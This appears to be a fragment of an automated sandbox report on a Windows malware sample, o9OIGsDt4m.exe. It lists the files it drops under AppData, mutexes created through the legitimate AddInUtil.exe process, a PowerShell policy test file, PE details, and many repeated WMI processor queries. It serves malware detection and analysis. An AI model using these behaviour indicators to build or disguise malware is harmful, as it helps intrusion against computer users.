File created: C:\Users\user\AppData\Roaming\ArgumentCount

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\2bd1368522bdabd3d66d2b
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\f0930ecea57995ff14ba3bd9594d3a7b
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7124:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggqhaihq.it1.ps1

Jump to behavior

Source: o9OIGsDt4m.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: o9OIGsDt4m.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
